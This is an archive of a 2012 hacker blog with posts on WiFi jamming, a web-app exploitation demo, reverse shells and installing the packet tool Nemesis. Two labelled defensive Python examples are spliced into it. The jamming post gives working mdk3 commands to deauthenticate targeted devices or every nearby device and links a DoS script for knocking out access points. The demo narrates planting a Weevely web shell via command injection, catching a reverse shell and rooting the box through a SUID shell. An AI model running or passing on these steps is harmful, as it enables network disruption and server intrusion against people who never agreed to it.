Thursday 15 March 2012

Updates to Insecurety Research - PHP Command Injection!

So, we have written an article about PHP Command Injection (Applies to other platforms too, we just covered PHP).

Read it here! PHP Command Injection - Insecurety Research

More to come...

~Insecurety Research Team.

Wednesday 14 March 2012

[802.11] Wireless Jamming

Ok. Infodox BRIEFLY touched upon 802.11 jamming in his talk at CampusCon (their site seems to be down at the moment).

For those interested, the talk can be downloaded here: Insecurety Research

Anyways, onward to "The Good Stuff". I (x41) am simply posting the parts he wrote so far, and when he comes back he says he will finish the job.

Wireless Jamming. Sometimes one wants to disable all 802.11 stuff within range (i.e. WiFi) for some reason (perhaps deauth everyone so a KARMA style attack will work better?) and often this can be a bit of a challenge.

Challenge accepted.

First off, let's get to grips with some software called "mdk3".

MDK3 is an 802.11 flooding tool, and comes preinstalled on BackTrack and several other Pentest distros.

However, let's assume you are running a standard Ubuntu box and have not got it installed... So start by installing aircrack-ng.

apt-get install aircrack-ng (ubuntu)
yum install aircrack-ng (fedora)
...Or, compile from sauce...
http://www.aircrack-ng.org/

Now. MDK3.

http://homepages.tu-darmstadt.de/~p_larbig/wlan/

Grab the source from here, untar, ./configure, make && make install (as root).

Then to run (as root):

PUT CARD INTO MONITOR MODE BEFORE CONTINUING!
sudo airmon-ng start wlan0 (where wlan0 is your wifi card)

mdk3 (arguments)

Some samples... (assumes mon0 is your monitor mode interface)

1. mdk3 mon0 x 1 -c (target client MAC) -t (target AP MAC)
This one simply deauths the victim client. Good for targeted jamming.

2. mdk3 mon0 d -b /root/blacklist
Assuming you have a list of MAC addresses you DON'T wish to have online, you put 'em in a list and blacklist 'em. This jams them.

3. mdk3 mon0 d -w (and the path to your whitelist file)
This kills everyone's WiFi EXCEPT the devices in the whitelist.
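From the defender's side, here is an added example (mine, not code from the post or from mdk3): a small Python detector that flags the deauth/disassoc floods a d-mode blacklist or whitelist run produces, working over raw 802.11 management frames without a radiotap header. The MAC addresses, timestamps and threshold are constructed for illustration.

```python
# Added example, not from the post or mdk3: detect deauth/disassoc floods like
# those mdk3's d mode sends, over raw 802.11 frames (no radiotap header).
import struct
from collections import defaultdict

SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 0x0A, 0x0C
BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)

def parse_deauth(frame: bytes):
    """Return (subtype, receiver, transmitter, bssid, reason) for a deauth or
    disassoc frame, else None. Frame control byte 0: bits 0-1 version, 2-3 type,
    4-7 subtype. Management header FC(2) Dur(2) A1(6) A2(6) A3(6) Seq(2) = 24
    bytes, then a little-endian 16-bit reason code."""
    if len(frame) < 26 or (frame[0] >> 2) & 0x3 != 0:   # type 0 = management
        return None
    subtype = frame[0] >> 4
    if subtype not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)
    return subtype, mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def find_floods(capture, window=1.0, threshold=10):
    """capture: iterable of (timestamp_seconds, frame_bytes). Returns
    {bssid: peak_count} for every BSSID whose deauth/disassoc count inside any
    sliding `window` exceeds `threshold`. A roam or AP reboot yields a handful
    of these frames; a jammer yields hundreds per second."""
    per_bssid = defaultdict(list)
    for ts, frame in capture:
        parsed = parse_deauth(frame)
        if parsed:
            per_bssid[parsed[3]].append(ts)
    floods = {}
    for bssid, times in per_bssid.items():
        times.sort()
        start = peak = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            floods[bssid] = peak
    return floods

def sample_frame(subtype, receiver, transmitter, bssid, reason=7):
    """Build a constructed in-memory test frame for feeding the detector."""
    addrs = b"".join(bytes.fromhex(a.replace(":", "")) for a in (receiver, transmitter, bssid))
    return struct.pack("<BBH", subtype << 4, 0, 0) + addrs + struct.pack("<HH", 0, reason)
```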

Now. On to more fun things... Killing APs.

Introducing "ap fucker".

AP Fucker is a python script that automates these DoS attacks. My preferred mode is "Destruction Mode". For obvious reasons.

Grab AP fucker here.. ApFucker - Pastebin

Running this is very simple. Just sudo bash (must be root), start the interface in monitor mode, and run it.

More to come - this was just an introduction!

Monday 12 March 2012

Infodox is AFK (x41)

x41 here, minding Infodox's accounts for him.

He is AFK. Indefinitely. He will eventually come back. We hope...
The loss of such an enthusiastic researcher would be a blow to us at Insecurety Research, as he was the guy who got it going and came up with all kinds of crazy ideas - from mixing SQLi/LFI to the possibility of distributed vuln scanning via XSS.

If he goes, those ideas may well vanish with him as they are located in his "internal hard drive".

Anyways, seeing as I have his blog and admin on the site and we have such a lovely audience, I may as well start posting things for him, etc.

Wednesday 7 March 2012

[Article] Reverse shells...

Ok. So I wrote a short article yesterday showing off a few reverse shell tricks and demoing them on a vulnerable web app using a Command Injection vulnerability.

Some people were asking "why it so basic?" and here is why: The idea of the article is not to provide script kids/blackhats with new info - it is well known - but to demonstrate how one can go from a small PHP bug to a full blown reverse shell.

I will be working up SNORT IDS Signatures for them all based on how they throw a shell back, just have to get some nice .pcaps of it first. I plan to also find a way to "signature" the IDS evading shellcode I wrote - and so kind of have an "arms race" with myself...

Article on Insecurety.net

Monday 5 March 2012

For Fuck Sake

So. Due to our bitcoin app it seems we have been blacklisted, our .co.cc domain has been nullrouted.

I have lodged a complaint about this, and suspect someone has been spamming their abuse dept in order to get my attention. I have a suspect, however I will do NOTHING about it until I get some proof.

For now we will be using THIS domain: theinfodox.blogspot.com

Until the situation resolves we will be working to let people know...

Friday 2 March 2012

OWASP Galway Begins!

Ok, this is a very short post as I am a tad busy, but, as of today (Friday, March Second, 2012), Galway (Ireland) has its own OWASP chapter setup by infodox!

Meetings are being prepared, as are workshops, talks and such, so watch this space for updates!

I will post links to its wiki/blog/etc later on today :)

Check out OWASP stuff at OWASP.ORG

Quick note regarding my last demo

Ok, the reason the LFI-RCE failed in my last demo was very simple: I messed up the Apache/PHP config in LAMPP while fuzzing earlier and forgot to reset it :/

Don't worry, my next demo will be on leveraging SQLi vulns in order to gain RCE, and I have to set up a better testbox anyway.

I will be showing the manual method + SQLMap methods of doing it all, and might even get a chance to video it!

WebApp Haxploitation with Weevely, Introducing InterSect.

Ok. This is a fairly pointless demo I made to demonstrate how a web-application bug (in this case LFI + Command Injection) can be leveraged to gain complete root access over a server. I simply took a bunch of screencaps during the demo I made to show a friend "Why web app bugs are dangerous".

So. Here goes!

The web app we used here was THIS: Mutillidae - IronGeek

Part One: The Buggy Page.
This shows the buggy application's vulnerable page. It is a simple "Do a DNS lookup" page which, just by looking at it, we can discern certainly has a Local File Inclusion vulnerability, and more than likely a Command Injection vulnerability.
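As an added example (mine, not code from the post or from Mutillidae), here are the two bug patterns such a lookup page carries, written in Python rather than PHP, each beside a hardened version. The hostname regex, the page table and the PAGES_DIR path are my assumptions.

```python
# Added example, not code from the post or from Mutillidae: the two bugs behind
# a "DNS lookup page" (command injection + LFI) in Python, beside a fix for each.
import re
import subprocess
from pathlib import Path

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens, no
# leading/trailing hyphen. Shell metacharacters (; | ` $ space) cannot pass this.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")

PAGES_DIR = Path("/var/www/app/pages")   # hypothetical web root (constructed)
ALLOWED_PAGES = {"home": "home.php", "dns": "dns-lookup.php"}   # fixed page table

def vulnerable_lookup_cmd(host: str) -> str:
    """The bug: request input concatenated into a shell command line
    (PHP's shell_exec("nslookup " . $_GET['host']) behaves the same)."""
    return "nslookup " + host

def vulnerable_include_path(page: str) -> Path:
    """The bug: request input used as a file name, so "../" walks out of PAGES_DIR."""
    return PAGES_DIR / page

def is_valid_hostname(host: str) -> bool:
    return HOSTNAME_RE.match(host) is not None

def safe_lookup_argv(host: str) -> list:
    """Fix: allow-list validation plus argv-style invocation. With a list argv,
    subprocess never starts a shell, so nothing in `host` can chain commands."""
    if not is_valid_hostname(host):
        raise ValueError("invalid hostname")
    return ["nslookup", host]

def safe_include_path(page: str) -> Path:
    """Fix: map the request parameter through ALLOWED_PAGES instead of using it
    as a path, then confirm the resolved file still lives under PAGES_DIR."""
    if page not in ALLOWED_PAGES:
        raise ValueError("unknown page")
    target = (PAGES_DIR / ALLOWED_PAGES[page]).resolve()
    if PAGES_DIR.resolve() not in target.parents:
        raise ValueError("path escapes PAGES_DIR")
    return target

def run_lookup(host: str) -> str:
    """Run the hardened lookup (shell=False is the default for a list argv)."""
    return subprocess.run(safe_lookup_argv(host), capture_output=True,
                          text=True, timeout=10).stdout
```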

Part Two: Let's Look for LFI
So. I knew there was LFI, and decided I would let fimap check for me, to see could I pull off any LFI-RCE stuff.

So. Now we know Fimap no canhaz RCE on the site, however there IS LFI. I want RCE, so I move swiftly along to the second vulnerability - Command injection.

Part Three: Command Injection
I decided to inject a Weevely Webshell into the app, so I put it up on my webserver and used wget to "inject" it.
Here is a screencap...

Ok. Shell seems injected, so we move on and try connect to it using the Weevely Client.

Part Four: There are Weevils In Your WWWROOT
Connecting to Weevely's PHP backdoor with the client. This is too easy...

So, let's see what it looks like in there...

SO! Got remote code execution and a "shell" like session. Let's see does Weevely's reverse shell work for us and try become uid=0 :D

Part Five: Netcat Says Meow
First off, we start Weevely's reverse shell plugin and tell it to phone home to us... We will be listening for it...

Ok. Now for the listener end of things...

w00t! We haz a shell :D
... Moving Swiftly along...

We decide to check kernel version and randomly see what commands work. I decided to lsusb for some arbitrary reason. Don't ask.

Ok. So we move on to escalating/exploring!

Part Six: Enter InterSect.
So I decide to test out InterSect, a wonderful post-exploitation tool developed by ohdae of BindShell Labs.

Here is a screencap of wgetting Intersect to the target box...

Aaaaand now to RUN Intersect ......

Ok. Intersect does not want to run as NON root, so it tells me how to get root on the box... Seeing as I like root... let's go get some!

Part Seven: We Are uid=0, + Harvest Some Infodox
So. I simply run a hypothetical root-exploit I had left in /tmp and getr00t! (It was actually a SUID shell I dropped earlier, as my kernel doesn't like localroots and panics!)

So. Got root. What next? Let's try see does InterSect want to run this time...

It Works! Sadly my battery promptly /quit a moment later but I think you get the idea of what you can do!

LINKS:
BindShell Labs
Intersect 2 - GitHub
Weevely - GoogleCode
Fimap - GoogleCode
And Finally
Insecurety Research

Thursday 1 March 2012

Installing Nemesis on Ubuntu/BackTrack

Ok. Simple Post to explain how to go about installing Nemesis on Ubuntu/BackTrack.

What is nemesis?
Nemesis is a packet crafting/sending utility. It, much like hping3, allows you to craft and send packets of a few different protocols. I mainly use it for crafting/sending ARP packets for ARP poisoning, and my tool "arptoxin" uses it.

This post is also available HERE

Step One: Sudo Bash
i.e. you must be root.

Step Two: Install Dependencies
apt-get install libdnet-dev
apt-get install libpcap-dev

Step Three: Install libnet
cd /usr
mkdir nembuild
cd nembuild
wget http://ips-builder.googlecode.com/files/libnet-1.0.2a.tar.gz
tar -xf libnet-1.0.2a.tar.gz
cd Libnet-1.0.2a
./configure
make && make install

Step Four: Install Nemesis
cd /usr/nembuild (if not still there!)
wget http://heanet.dl.sourceforge.net/project/nemesis/nemesis/1.4/nemesis-1.4.tar.gz
tar -xf nemesis-1.4.tar.gz
cd nemesis-1.4
./configure --with-libnet-includes=/usr/nembuild/Libnet-1.0.2a/include --with-libnet-libraries=/usr/nembuild/Libnet-1.0.2a/lib
make && make install

Done! Nemesis SHOULD look like this...